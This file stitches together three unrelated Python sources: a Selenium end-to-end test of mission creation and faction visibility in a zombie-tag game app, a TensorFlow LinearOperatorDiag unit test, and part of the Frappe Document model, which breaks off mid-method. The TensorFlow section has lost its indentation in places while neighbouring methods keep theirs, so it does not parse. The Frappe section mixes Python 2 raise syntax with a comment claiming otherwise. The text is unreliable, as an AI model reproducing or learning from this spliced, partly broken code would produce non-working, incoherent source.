# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
import time
def main(argv):
  # Vestigial entry point left over from the file template: the actual
  # test logic runs at module level below (after the imports), so this
  # function intentionally does nothing.
  pass

if __name__ == '__main__':
  main(sys.argv)
import setup
from selenium.webdriver.common.by import By
def insertAndVerifyMissionInfo(
    name,
    startYear,
    startMonth,
    startDay,
    startTime,
    endYear,
    endMonth,
    endDay,
    endTime,
    details,
    groupName):
  """Fills in the mission create/edit form and verifies the result.

  Clears each date/time input (Backspace), types the given values, picks
  the group, submits, then checks the new row in the admin missions table.
  All arguments are strings as they should appear in the form fields.

  Uses the module-level `driver`, so it may only be called after
  `driver = setup.MakeDriver(...)` below has executed.
  """
  driver.SendKeys([[By.ID, 'form-section-mission-name'],[By.TAG_NAME, 'input']], name) #TODO(aliengirl): Figure out why occasionally it says this element doesn't exist
  # Start date/time: clear the existing value, then type the new one.
  driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'year'],[By.TAG_NAME, 'input']], 4)
  driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'year'],[By.TAG_NAME, 'input']], startYear)
  # NOTE(review): the month fields pass no count to Backspace (unlike
  # year/day/time) -- presumably the default clears enough; confirm.
  driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'month'],[By.TAG_NAME, 'input']])
  driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'month'],[By.TAG_NAME, 'input']], startMonth)
  driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'day'],[By.TAG_NAME, 'input']], 2)
  driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'day'],[By.TAG_NAME, 'input']], startDay)
  driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'time'],[By.TAG_NAME, 'input']], 7)
  driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'time'],[By.TAG_NAME, 'input']], startTime)
  # End date/time.
  driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'year'],[By.TAG_NAME, 'input']], 4)
  driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'year'],[By.TAG_NAME, 'input']], endYear)
  driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'month'],[By.TAG_NAME, 'input']])
  driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'month'],[By.TAG_NAME, 'input']], endMonth)
  driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'day'],[By.TAG_NAME, 'input']], 2)
  driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'day'],[By.TAG_NAME, 'input']], endDay)
  driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'time'],[By.TAG_NAME, 'input']], 7)
  driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'time'],[By.TAG_NAME, 'input']], endTime)
  driver.SendKeys([[By.ID, 'form-section-mission-details'],[By.TAG_NAME, 'textarea']], details)
  # Pick the target group from the dropdown and submit.
  driver.Click([[By.ID, 'missionForm'], [By.ID, 'form-section-mission-group'], [By.ID, 'name']])
  driver.Click([[By.ID, 'missionForm'], [By.ID, 'form-section-mission-group'], [By.NAME, 'group-name-' + groupName]])
  driver.Click([[By.ID, 'missionForm'], [By.NAME, 'form-buttons-Mission'], [By.ID, 'done']])
  # Verify the mission shows up in the admin's list of missions
  driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionName']], name)
  driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionGroup']], groupName)
  driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionStart']], startTime)
  driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionEnd']], endTime)
  driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionDetails']], details[0:10])
# End-to-end flow: as admin (zella) create/edit missions, then verify
# visibility per faction: humans (jack) see human/everyone missions,
# zombies (zeke) see zombie/everyone missions.
driver = setup.MakeDriver(user="zella")
driver.DrawerMenuClick('Admin Missions')
driver.Click([[By.NAME, 'close-notification']])

# Delete the two missions which start out there
driver.TableMenuClick([[By.NAME, "mission-row-first zed mission!"]], 'Delete')
# TODO(verdagon): take this back out, was added in because of a weird menu issue that deleted both the missions
# New finding: i once saw it accidentally hit the first human mission (the first row) instead of the first zed
# mission (the second row) and then i think delete them both with one tap.
time.sleep(2)
driver.TableMenuClick([[By.NAME, "mission-row-first human mission!"]], 'Delete')

# Make sure both humans and zombies get a default message when no missions are posted.
driver.DrawerMenuClick('Dashboard')
driver.ExpectContains([[By.NAME, 'next-mission-box']], "The next mission's details will be posted here.")
driver.SwitchUser('zeke') # He's a zombie
driver.ExpectContains([[By.NAME, 'next-mission-box']], "The next mission's details will be posted here.")

# Log back in as an admin.
driver.SwitchUser('zella')
driver.DrawerMenuClick('Admin Missions')

# Create a human mission
driver.Click([[By.ID, 'add']])
insertAndVerifyMissionInfo(
    name='insert witty and entertaining name here',
    startYear='2017',
    startMonth='10',
    startDay='20',
    startTime='3:00am',
    endYear='2038',
    endMonth='4',
    endDay='2',
    endTime='10:15pm',
    details='<div>take over the world</div>',
    groupName='Resistance')

# Create a zombie mission
driver.Click([[By.ID, 'add']])
insertAndVerifyMissionInfo(
    name='zed mission',
    startYear='2017',
    startMonth='1',
    startDay='2',
    startTime='12:34am',
    endYear='2038',
    endMonth='4',
    endDay='2',
    endTime='2:34pm',
    details='<div>eat humans</div>',
    groupName='Horde')

# Log in as a human (Jack), make sure he can see the human mission but not the zombie mission
driver.SwitchUser('jack')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'take over the world')
driver.ExpectContains([[By.NAME, 'next-mission-box']], "Oct 20 3:00am") # start time
driver.ExpectContains([[By.NAME, 'next-mission-box']], "Apr 2 10:15pm") # end time
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'eat humans', should_exist=False)

# Find the mission in the drawer as well
driver.DrawerMenuClick('Missions')
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-insert witty and entertaining name here']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-insert witty and entertaining name here']], "take over the world")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Oct 20 3:00am") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Apr 2 10:15pm") # end time

# Log in as a zombie (Zeke), make sure he can see the zombie mission but not the human mission
driver.SwitchUser('zeke')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'eat humans')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'take over the world', should_exist=False)

# Find the missions in the drawer as well
driver.DrawerMenuClick('Missions')
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-zed mission']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-zed mission']], "eat humans")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-zed mission']], "Jan 2 12:34am") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-zed mission']], "Apr 2 2:34pm") # end time

# As an admin, create another human mission
driver.SwitchUser('zella')
driver.Click([[By.ID, 'add']])
insertAndVerifyMissionInfo(
    name='Defeat the dread zombie boss Gnashable the Zeebweeble',
    startYear='2017',
    startMonth='9',
    startDay='20',
    startTime='3:00am',
    endYear='2037',
    endMonth='4',
    endDay='2',
    endTime='10:15pm',
    details='<div>Basically, we just run around in circles trying not to die.</div>',
    groupName='Everyone')
driver.SwitchUser('jack')
driver.DrawerMenuClick('Dashboard')

# On the dashboard the new mission shows up (since the end date is sooner than the other one)
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'Basically, we just run around in circles trying not to die.')

# On the missions page, both should show up
driver.DrawerMenuClick('Missions')
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-insert witty and entertaining name here']])
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-Defeat the dread zombie boss Gnashable the Zeebweeble']])

# As an admin, change the mission end date to later than the other human mission
driver.SwitchUser('zella')
driver.DrawerMenuClick('Admin Missions')
driver.TableMenuClick([[By.NAME, 'mission-row-Defeat the dread zombie boss Gnashable the Zeebweeble']], 'Edit')
insertAndVerifyMissionInfo(
    name='Defeat the super scary awful zombie boss Gnashable the Zeebweeble',
    startYear='2018',
    startMonth='10',
    startDay='21',
    startTime='12:34pm',
    endYear='2039',
    endMonth='5',
    endDay='3',
    endTime='11:16pm',
    details='<div>Basically, we just run around in ellipses trying not to die.</div>',
    groupName='Everyone')

# Log in as a human (Jack). Show that the new mission doesn't show up anymore
driver.SwitchUser('jack')
driver.DrawerMenuClick('Dashboard')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'take over the world')
driver.DrawerMenuClick('Missions')

# On the missions page, both should show up
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-insert witty and entertaining name here']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-insert witty and entertaining name here']], "take over the world")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Oct 20 3:00am") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Apr 2 10:15pm") # end time
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']], "Basically, we just run around in ellipses trying not to die.")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']], "Oct 21 12:34pm") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']], "May 3 11:16pm") # end time

driver.Quit()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_test_util
from tensorflow.python.platform import test
linalg = linalg_lib
class LinearOperatorDiagTest(
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest."""
def operator_and_matrix(
self, build_info, dtype, use_placeholder,
ensure_self_adjoint_and_pd=False):
shape = list(build_info.shape)
diag = linear_operator_test_util.random_sign_uniform(
shape[:-1], minval=1., maxval=2., dtype=dtype)
if ensure_self_adjoint_and_pd:
# Abs on complex64 will result in a float32, so we cast back up.
diag = math_ops.cast(math_ops.abs(diag), dtype=dtype)
lin_op_diag = diag
if use_placeholder:
lin_op_diag = array_ops.placeholder_with_default(diag, shape=None)
operator = linalg.LinearOperatorDiag(
lin_op_diag,
is_self_adjoint=True if ensure_self_adjoint_and_pd else None,
is_positive_definite=True if ensure_self_adjoint_and_pd else None)
matrix = array_ops.matrix_diag(diag)
return operator, matrix
  def test_assert_positive_definite_raises_for_zero_eigenvalue(self):
    """assert_positive_definite must fail when an eigenvalue is exactly 0."""
    # Matrix with one positive eigenvalue and one zero eigenvalue.
    with self.cached_session():
      diag = [1.0, 0.0]
      operator = linalg.LinearOperatorDiag(diag)
      # is_self_adjoint should be auto-set for real diag.
      self.assertTrue(operator.is_self_adjoint)
      with self.assertRaisesOpError("non-positive.*not positive definite"):
        operator.assert_positive_definite().run()
  def test_assert_positive_definite_raises_for_negative_real_eigvalues(self):
    """A negative real part must fail the PD check even for complex diag."""
    with self.cached_session():
      diag_x = [1.0, -2.0]
      diag_y = [0., 0.]  # Imaginary eigenvalues should not matter.
      diag = math_ops.complex(diag_x, diag_y)
      operator = linalg.LinearOperatorDiag(diag)
      # is_self_adjoint should not be auto-set for complex diag.
      self.assertTrue(operator.is_self_adjoint is None)
      with self.assertRaisesOpError("non-positive real.*not positive definite"):
        operator.assert_positive_definite().run()
  @test_util.run_deprecated_v1
  def test_assert_positive_definite_does_not_raise_if_pd_and_complex(self):
    """Complex diag with strictly positive real parts passes the PD check."""
    with self.cached_session():
      x = [1., 2.]
      y = [1., 0.]
      diag = math_ops.complex(x, y)  # Re[diag] > 0.
      # Should not fail
      linalg.LinearOperatorDiag(diag).assert_positive_definite().run()
  def test_assert_non_singular_raises_if_zero_eigenvalue(self):
    """A zero diagonal entry makes the operator singular."""
    # Singular matrix with one positive eigenvalue and one zero eigenvalue.
    with self.cached_session():
      diag = [1.0, 0.0]
      operator = linalg.LinearOperatorDiag(diag, is_self_adjoint=True)
      with self.assertRaisesOpError("Singular operator"):
        operator.assert_non_singular().run()
  @test_util.run_deprecated_v1
  def test_assert_non_singular_does_not_raise_for_complex_nonsingular(self):
    """Nonzero complex diagonal entries pass the non-singularity check."""
    with self.cached_session():
      x = [1., 0.]
      y = [0., 1.]
      diag = math_ops.complex(x, y)  # Entries 1 and 1j: both nonzero.
      # Should not raise.
      linalg.LinearOperatorDiag(diag).assert_non_singular().run()
  def test_assert_self_adjoint_raises_if_diag_has_complex_part(self):
    """A nonzero imaginary part means the operator is not self-adjoint."""
    with self.cached_session():
      x = [1., 0.]
      y = [0., 1.]
      diag = math_ops.complex(x, y)
      operator = linalg.LinearOperatorDiag(diag)
      with self.assertRaisesOpError("imaginary.*not self-adjoint"):
        operator.assert_self_adjoint().run()
  @test_util.run_deprecated_v1
  def test_assert_self_adjoint_does_not_raise_for_diag_with_zero_imag(self):
    """Complex dtype with zero imaginary part is still self-adjoint."""
    with self.cached_session():
      x = [1., 0.]
      y = [0., 0.]
      diag = math_ops.complex(x, y)
      operator = linalg.LinearOperatorDiag(diag)
      # Should not raise
      operator.assert_self_adjoint().run()
  def test_scalar_diag_raises(self):
    """The diag argument must be at least rank 1; a scalar is rejected."""
    with self.assertRaisesRegexp(ValueError, "must have at least 1 dimension"):
      linalg.LinearOperatorDiag(1.)
  def test_broadcast_matmul_and_solve(self):
    """matmul/solve must broadcast the operator's batch dims against x."""
    # These cannot be done in the automated (base test class) tests since they
    # test shapes that tf.matmul cannot handle.
    # In particular, tf.matmul does not broadcast.
    with self.cached_session() as sess:
      x = random_ops.random_normal(shape=(2, 2, 3, 4))

      # This LinearOperatorDiag will be broadcast to (2, 2, 3, 3) during solve
      # and matmul with 'x' as the argument.
      diag = random_ops.random_uniform(shape=(2, 1, 3))
      operator = linalg.LinearOperatorDiag(diag, is_self_adjoint=True)
      self.assertAllEqual((2, 1, 3, 3), operator.shape)

      # Create a batch matrix with the broadcast shape of operator.
      diag_broadcast = array_ops.concat((diag, diag), 1)
      mat = array_ops.matrix_diag(diag_broadcast)
      self.assertAllEqual((2, 2, 3, 3), mat.get_shape())  # being pedantic.

      # Operator result must match explicit dense matmul on the
      # broadcast-expanded matrix.
      operator_matmul = operator.matmul(x)
      mat_matmul = math_ops.matmul(mat, x)
      self.assertAllEqual(operator_matmul.get_shape(), mat_matmul.get_shape())
      self.assertAllClose(*self.evaluate([operator_matmul, mat_matmul]))

      # Same check for solve.
      operator_solve = operator.solve(x)
      mat_solve = linalg_ops.matrix_solve(mat, x)
      self.assertAllEqual(operator_solve.get_shape(), mat_solve.get_shape())
      self.assertAllClose(*self.evaluate([operator_solve, mat_solve]))
def test_diag_matmul(self):
operator1 = linalg_lib.LinearOperatorDiag([2., 3.])
operator2 = linalg_lib.LinearOperatorDiag([1., 2.])
operator3 = linalg_lib.LinearOperatorScaledIdentity(
num_rows=2, multiplier=3.)
operator_matmul = operator1.matmul(operator2)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2., 6.], self.evaluate(operator_matmul.diag))
operator_matmul = operator2.matmul(operator1)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2., 6.], self.evaluate(operator_matmul.diag))
operator_matmul = operator1.matmul(operator3)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([6., 9.], self.evaluate(operator_matmul.diag))
operator_matmul = operator3.matmul(operator1)
self.assertTrue(isinstance(
operator_matmul,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([6., 9.], self.evaluate(operator_matmul.diag))
def test_diag_solve(self):
operator1 = linalg_lib.LinearOperatorDiag([2., 3.], is_non_singular=True)
operator2 = linalg_lib.LinearOperatorDiag([1., 2.], is_non_singular=True)
operator3 = linalg_lib.LinearOperatorScaledIdentity(
num_rows=2, multiplier=3., is_non_singular=True)
operator_solve = operator1.solve(operator2)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([0.5, 2 / 3.], self.evaluate(operator_solve.diag))
operator_solve = operator2.solve(operator1)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2., 3 / 2.], self.evaluate(operator_solve.diag))
operator_solve = operator1.solve(operator3)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([3 / 2., 1.], self.evaluate(operator_solve.diag))
operator_solve = operator3.solve(operator1)
self.assertTrue(isinstance(
operator_solve,
linalg_lib.LinearOperatorDiag))
self.assertAllClose([2 / 3., 1.], self.evaluate(operator_solve.diag))
def test_diag_adjoint_type(self):
diag = [1., 3., 5., 8.]
operator = linalg.LinearOperatorDiag(diag, is_non_singular=True)
self.assertIsInstance(operator.adjoint(), linalg.LinearOperatorDiag)
def test_diag_cholesky_type(self):
diag = [1., 3., 5., 8.]
operator = linalg.LinearOperatorDiag(
diag,
is_positive_definite=True,
is_self_adjoint=True,
)
self.assertIsInstance(operator.cholesky(), linalg.LinearOperatorDiag)
def test_diag_inverse_type(self):
diag = [1., 3., 5., 8.]
operator = linalg.LinearOperatorDiag(diag, is_non_singular=True)
self.assertIsInstance(operator.inverse(), linalg.LinearOperatorDiag)
if __name__ == "__main__":
  # Register the parameterized base-class tests on the suite before running.
  linear_operator_test_util.add_tests(LinearOperatorDiagTest)
  test.main()
|
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, msgprint
from frappe.utils import flt, cint, cstr, now
from frappe.modules import load_doctype_module
from frappe.model.base_document import BaseDocument
from frappe.model.naming import set_new_name
# once_only validation
# methods
def get_doc(arg1, arg2=None):
	"""Return a Document instance for the given arguments.

	`arg1` may be an existing BaseDocument (returned unchanged), a doctype
	name (string), or a dict carrying a "doctype" key.  `arg2` is passed
	through to the controller (document name, or a filters dict).

	Raises ImportError if no controller class can be resolved.
	"""
	if isinstance(arg1, BaseDocument):
		return arg1
	elif isinstance(arg1, basestring):
		doctype = arg1
	else:
		doctype = arg1.get("doctype")
	controller = get_controller(doctype)
	if controller:
		return controller(arg1, arg2)
	# use the call form of raise: identical at runtime on Python 2, and
	# keeps the file parseable by Python 3 tooling
	raise ImportError(arg1)
# cache of doctype name -> controller class, filled lazily by get_controller()
_classes = {}
def get_controller(doctype):
	"""Return the controller class for `doctype`, loading and caching it.

	The controller is the class named after the doctype (spaces removed)
	inside the doctype's module.  Raises ImportError if the class is
	missing or is not a Document subclass.
	"""
	if doctype not in _classes:
		module = load_doctype_module(doctype)
		classname = doctype.replace(" ", "")
		_class = getattr(module, classname, None)
		# the original code re-fetched the same attribute after the
		# issubclass check; a single getattr with a None default is enough
		if _class is None or not issubclass(_class, Document):
			raise ImportError(doctype)
		_classes[doctype] = _class
	return _classes[doctype]
class Document(BaseDocument):
	"""Base controller for all doctypes.

	Handles the load / insert / save lifecycle, permission checks,
	validation, docstatus transitions and doc_events hooks.  All database
	access goes through frappe.db; statement order inside the lifecycle
	methods is significant.
	"""
	def __init__(self, arg1, arg2=None):
		"""Construct from (doctype, name), (doctype, filters-dict), a single
		doctype name, or a dict of field values."""
		self.doctype = self.name = None
		if arg1 and isinstance(arg1, basestring):
			if not arg2:
				# single
				self.doctype = self.name = arg1
			else:
				self.doctype = arg1
				if isinstance(arg2, dict):
					# filter
					self.name = frappe.db.get_value(arg1, arg2, "name")
					if self.name is None:
						raise frappe.DoesNotExistError, (arg1, arg2)
				else:
					self.name = arg2
			self.load_from_db()
		elif isinstance(arg1, dict):
			# in-memory document built from a dict of values
			super(Document, self).__init__(arg1)
			self.init_valid_columns()
		else:
			# incorrect arguments. let's not proceed.
			raise frappe.DataError("Document({0}, {1})".format(arg1, arg2))
	def load_from_db(self):
		"""Load parent field values and all child table rows from the database."""
		if not getattr(self, "_metaclass", False) and self.meta.issingle:
			# singles are stored as (doctype, field, value) rows in tabSingles
			self.update(frappe.db.get_singles_dict(self.doctype))
			self.init_valid_columns()
			self._fix_numeric_types()
		else:
			d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1)
			if not d:
				frappe.throw(("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
			self.update(d)
		if self.name=="DocType" and self.doctype=="DocType":
			# bootstrap case: DocType's own meta cannot be loaded normally
			from frappe.model.meta import doctype_table_fields
			table_fields = doctype_table_fields
		else:
			table_fields = self.meta.get_table_fields()
		for df in table_fields:
			children = frappe.db.get_values(df.options,
				{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
				"*", as_dict=True, order_by="idx asc")
			if children:
				self.set(df.fieldname, children)
			else:
				self.set(df.fieldname, [])
	def has_permission(self, permtype):
		"""Return True if the session user has `permtype` permission on this doc."""
		if getattr(self, "ignore_permissions", False):
			return True
		return frappe.has_permission(self.doctype, permtype, self)
	def raise_no_permission_to(self, perm_type):
		"""Raise PermissionError mentioning the attempted action."""
		raise frappe.PermissionError("No permission to {} {} {}".format(perm_type, self.doctype, self.name or ""))
	def insert(self, ignore_permissions=None):
		"""Insert this document (and its children) as new records.

		Runs before_insert, the before-save validation chain, then the
		after_insert / post-save hooks.  Returns self.
		"""
		if ignore_permissions!=None:
			self.ignore_permissions = ignore_permissions
		self.set("__islocal", True)
		if not self.has_permission("create"):
			self.raise_no_permission_to("create")
		self._set_defaults()
		self._set_docstatus_user_and_timestamp()
		self.check_if_latest()
		set_new_name(self)
		self.run_method("before_insert")
		self.set_parent_in_children()
		self.run_before_save_methods()
		self._validate()
		# run validate, on update etc.
		# parent
		if getattr(self.meta, "issingle", 0):
			self.update_single(self.get_valid_dict())
		else:
			self.db_insert()
		# children
		for d in self.get_all_children():
			d.db_insert()
		self.run_method("after_insert")
		self.run_post_save_methods()
		return self
	def save(self, ignore_permissions=None):
		"""Save this document, inserting it first if it is new.

		Deletes child rows that are no longer present in the in-memory
		document.  Returns self.
		"""
		if ignore_permissions!=None:
			self.ignore_permissions = ignore_permissions
		if self.get("__islocal") or not self.get("name"):
			self.insert()
			return
		if not self.has_permission("write"):
			self.raise_no_permission_to("save")
		self._set_docstatus_user_and_timestamp()
		self.check_if_latest()
		self.set_parent_in_children()
		self.run_before_save_methods()
		self._validate()
		# parent
		if self.meta.issingle:
			self.update_single(self.get_valid_dict())
		else:
			self.db_update()
		# children: update surviving rows, then delete rows removed in memory
		child_map = {}
		ignore_children_type = self.get("ignore_children_type") or []
		for d in self.get_all_children():
			d.db_update()
			child_map.setdefault(d.doctype, []).append(d.name)
		for df in self.meta.get_table_fields():
			if df.options not in ignore_children_type:
				cnames = child_map.get(df.options) or []
				if cnames:
					frappe.db.sql("""delete from `tab%s` where parent=%s and parenttype=%s and
						name not in (%s)""" % (df.options, '%s', '%s', ','.join(['%s'] * len(cnames))),
						tuple([self.name, self.doctype] + cnames))
				else:
					frappe.db.sql("""delete from `tab%s` where parent=%s and parenttype=%s""" \
						% (df.options, '%s', '%s'), (self.name, self.doctype))
		self.run_post_save_methods()
		return self
	def update_single(self, d):
		"""Rewrite this single doctype's rows in tabSingles from dict `d`."""
		frappe.db.sql("""delete from tabSingles where doctype=%s""", self.doctype)
		for field, value in d.iteritems():
			if field != "doctype":
				frappe.db.sql("""insert into tabSingles(doctype, field, value)
					values (%s, %s, %s)""", (self.doctype, field, value))
	def _set_docstatus_user_and_timestamp(self):
		"""Stamp modified/creation/owner/docstatus on self and all children."""
		self._original_modified = self.modified
		self.modified = now()
		self.modified_by = frappe.session.user
		if not self.creation:
			self.creation = self.modified
		if not self.owner:
			self.owner = self.modified_by
		if self.docstatus==None:
			self.docstatus=0
		for d in self.get_all_children():
			d.docstatus = self.docstatus
			d.modified = self.modified
			d.modified_by = self.modified_by
			if not d.owner:
				d.owner = self.owner
			if not d.creation:
				d.creation = self.creation
	def _validate(self):
		"""Run mandatory / link / constant validation for self and children."""
		self._validate_mandatory()
		self._validate_links()
		self._validate_constants()
		for d in self.get_all_children():
			d._validate_constants()
		self._extract_images_from_text_editor()
	def _set_defaults(self):
		"""Fill missing fields from the doctype defaults (skipped during import)."""
		if frappe.flags.in_import:
			return
		new_doc = frappe.new_doc(self.doctype)
		self.update_if_missing(new_doc)
		# children
		for df in self.meta.get_table_fields():
			new_doc = frappe.new_doc(df.options)
			value = self.get(df.fieldname)
			if isinstance(value, list):
				for d in value:
					d.update_if_missing(new_doc)
	def check_if_latest(self):
		"""Abort with TimestampMismatchError if the DB copy changed since load.

		Also validates the docstatus transition for the pending action.
		"""
		conflict = False
		self._action = "save"
		if not self.get('__islocal'):
			if self.meta.issingle:
				modified = frappe.db.get_value(self.doctype, self.name, "modified")
				if cstr(modified) and cstr(modified) != cstr(self._original_modified):
					conflict = True
			else:
				tmp = frappe.db.get_value(self.doctype, self.name,
					["modified", "docstatus"], as_dict=True)
				if not tmp:
					frappe.throw(_("Record does not exist"))
				modified = cstr(tmp.modified)
				if modified and modified != cstr(self._original_modified):
					conflict = True
				self.check_docstatus_transition(tmp.docstatus)
			if conflict:
				frappe.msgprint(_("Error: Document has been modified after you have opened it") \
				+ (" (%s, %s). " % (modified, self.modified)) \
				+ _("Please refresh to get the latest document."),
					raise_exception=frappe.TimestampMismatchError)
		else:
			self.check_docstatus_transition(0)
	def check_docstatus_transition(self, docstatus):
		"""Set self._action for the transition from DB `docstatus` to self.docstatus.

		Valid transitions: 0->0 save, 0->1 submit, 1->1 update_after_submit,
		1->2 cancel.  Anything else raises DocstatusTransitionError /
		ValidationError.
		"""
		if not self.docstatus:
			self.docstatus = 0
		if docstatus==0:
			if self.docstatus==0:
				self._action = "save"
			elif self.docstatus==1:
				self._action = "submit"
				if not self.has_permission("submit"):
					self.raise_no_permission_to("submit")
			else:
				raise frappe.DocstatusTransitionError("Cannot change docstatus from 0 to 2")
		elif docstatus==1:
			if self.docstatus==1:
				self._action = "update_after_submit"
				self.validate_update_after_submit()
				if not self.has_permission("submit"):
					self.raise_no_permission_to("submit")
			elif self.docstatus==2:
				self._action = "cancel"
				if not self.has_permission("cancel"):
					self.raise_no_permission_to("cancel")
			else:
				raise frappe.DocstatusTransitionError("Cannot change docstatus from 1 to 0")
		elif docstatus==2:
			raise frappe.ValidationError
	def set_parent_in_children(self):
		"""Point every child row's parent/parenttype at this document."""
		for d in self.get_all_children():
			d.parent = self.name
			d.parenttype = self.doctype
	def validate_update_after_submit(self):
		"""Ensure only allowed fields changed on a submitted document."""
		if getattr(self, "ignore_validate_update_after_submit", False):
			return
		self._validate_update_after_submit()
		for d in self.get_all_children():
			d._validate_update_after_submit()
		# TODO check only allowed values are updated
	def _validate_mandatory(self):
		"""Raise MandatoryError listing all empty mandatory fields."""
		if self.get("ignore_mandatory"):
			return
		missing = self._get_missing_mandatory_fields()
		for d in self.get_all_children():
			missing.extend(d._get_missing_mandatory_fields())
		if not missing:
			return
		for fieldname, msg in missing:
			msgprint(msg)
		raise frappe.MandatoryError(", ".join((each[0] for each in missing)))
	def _validate_links(self):
		"""Raise LinkValidationError if any Link field points to a missing record."""
		if self.get("ignore_links"):
			return
		invalid_links = self.get_invalid_links()
		for d in self.get_all_children():
			invalid_links.extend(d.get_invalid_links())
		if not invalid_links:
			return
		msg = ", ".join((each[2] for each in invalid_links))
		frappe.throw(_("Could not find {0}").format(msg),
			frappe.LinkValidationError)
	def get_all_children(self, parenttype=None):
		"""Return all child rows; with `parenttype`, only that child doctype's rows."""
		ret = []
		for df in self.meta.get("fields", {"fieldtype": "Table"}):
			if parenttype:
				if df.options==parenttype:
					return self.get(df.fieldname)
			value = self.get(df.fieldname)
			if isinstance(value, list):
				ret.extend(value)
		return ret
	def _extract_images_from_text_editor(self):
		"""Move inline images in Text Editor fields out to file attachments."""
		from frappe.utils.file_manager import extract_images_from_html
		if self.doctype != "DocType":
			for df in self.meta.get("fields", {"fieldtype":"Text Editor"}):
				extract_images_from_html(self, df.fieldname)
	def run_method(self, method, *args, **kwargs):
		"""run standard triggers, plus those in frappe"""
		if hasattr(self, method):
